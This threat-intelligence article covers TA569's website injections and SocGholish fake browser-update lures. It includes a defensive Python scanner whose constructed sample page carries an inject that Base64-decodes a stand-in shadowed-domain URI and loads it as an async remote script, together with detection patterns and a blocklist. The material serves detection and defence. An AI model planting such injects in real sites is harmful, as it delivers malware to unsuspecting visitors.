
Looking Deep into TA569 and its SocGholish Payload

TA569 is a highly active threat actor best known for using website injections to deliver the SocGholish payload. Proofpoint researchers have recently observed changes in TA569's TTPs: a growing number of injection types and a shift toward payloads other than SocGholish.

Diving into details

SocGholish is typically distributed through URLs that look legitimate and that arrive in otherwise benign automated emails or are shared between users.
  • The URLs point to legitimate websites that have been compromised and injected with malicious code, so the links themselves look innocuous and pass casual inspection.
  • The emails carrying these URLs are often routine messages such as newsletters or notifications from services like Google Alerts, which is why they are not sent by the attacker and are hard to filter on their own.

Cliff notes on TA569

  • TA569 is an Initial Access Broker (IAB) that targets large organizations and sells access to other groups for follow-on attacks, including ransomware.
  • In addition to being an IAB, TA569 is believed to provide a pay-per-install service to other threat actors. 
  • The service allows customers to request specific payloads, which TA569 then delivers using its extensive network of injections and infrastructure.

Updates in TTPs

The threat group has been observed repeatedly reinfecting websites that had already been cleaned of its injections. Proofpoint refers to this as strobing: the injection is removed from a previously infected site and later reinstated, so a site that has been remediated once cannot be assumed to stay clean.
  • The injections now fall into two broad categories: those deploying SocGholish, and a second family, referred to as Scriptzzbn injections, that deploys other payloads.
  • On November 26, 2022, the researchers saw a new type of inject, with a follow-on chain of requests, that TA569 had not used before.
  • This chain ultimately led to the expected fake browser update lure and a JavaScript file as the delivered payload.
  • To request stage 2 from an actor-controlled shadowed domain (a subdomain planted under a legitimate domain), the inject used a simple async script whose URI was Base64-encoded; decoding that string exposes the stage-2 domain, which is the indicator defenders should extract.
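As an added illustration, not code from Proofpoint or from the original article, the following Python scanner looks for the inject shape described above in saved page source: an inline script that creates an async script element, sets its src by decoding a Base64 string, and appends it to the document. It decodes the URI, reports whether the host is third-party relative to the page, and matches hosts against a domain blocklist of the kind vendors publish. The sample HTML, hostnames, blocklist and variable names are constructed for the example and are not real TA569 indicators.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed sample page. The inject shape follows the description above
# (inline script -> async <script> whose src is a Base64-decoded URI); the
# hostnames, path and variable names are invented and are not real indicators.
STAGE2_URI = "https://stage2.example-shadowed.invalid/loader.js"
_B64 = base64.b64encode(STAGE2_URI.encode()).decode()
SAMPLE_HTML = f"""<html><head><title>Compromised site (constructed)</title>
<script>
var s=document.createElement('script');s.async=true;
s.src=atob('{_B64}');document.head.appendChild(s);
</script>
<script>
// benign: synchronous first-party loader without Base64 obfuscation
var t=document.createElement('script');t.src='/static/app.js';document.head.appendChild(t);
</script>
</head><body><p>hello</p></body></html>"""

INLINE_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
ASYNC_RE = re.compile(r"\.async\s*=\s*true")


def decode_b64_uri(token):
    """Return the decoded string if the Base64 token decodes to a URL-like value, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    return text if text.startswith(("http://", "https://", "//")) else None


def registrable_part(host):
    """Crude 'last two labels' approximation of the registrable domain (no PSL lookup)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def find_async_b64_loads(html, page_host):
    """Find inline scripts that async-load a Base64-decoded URI; flag third-party hosts."""
    findings = []
    for body in INLINE_SCRIPT_RE.findall(html):
        if not ASYNC_RE.search(body):
            continue
        for token in ATOB_RE.findall(body):
            uri = decode_b64_uri(token)
            if uri is None:
                continue
            host = urlparse("https:" + uri if uri.startswith("//") else uri).hostname or ""
            findings.append({
                "uri": uri,
                "host": host,
                # a shadowed subdomain of the page's own domain would NOT be flagged
                # here, so treat third_party as one signal, not the only one
                "third_party": registrable_part(host) != registrable_part(page_host),
            })
    return findings


def match_blocklist(findings, blocked_domains):
    """Keep findings whose host equals, or is a subdomain of, a blocked domain."""
    hits = []
    for f in findings:
        h = f["host"]
        if any(h == d or h.endswith("." + d) for d in blocked_domains):
            hits.append(f)
    return hits


if __name__ == "__main__":
    found = find_async_b64_loads(SAMPLE_HTML, "victim-site.invalid")
    for f in found:
        print(f)
    # hypothetical blocklist entry standing in for a vendor-published domain rule
    print(match_blocklist(found, ["example-shadowed.invalid"]))
```

Because of the strobing behaviour described above, a scan like this is only useful if it is rerun periodically against a site that was already cleaned; a single clean result does not mean the injection will not come back.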

The bottom line

Proofpoint has published rules covering TA569-controlled domains; these can be used to monitor and block the requests that fetch the malware payloads. Defenders should stay vigilant when triaging alerts, since a site that was cleaned once may be reinfected, and should educate end users about the fake browser update lure and the other TTPs this group uses.
Cyware Publisher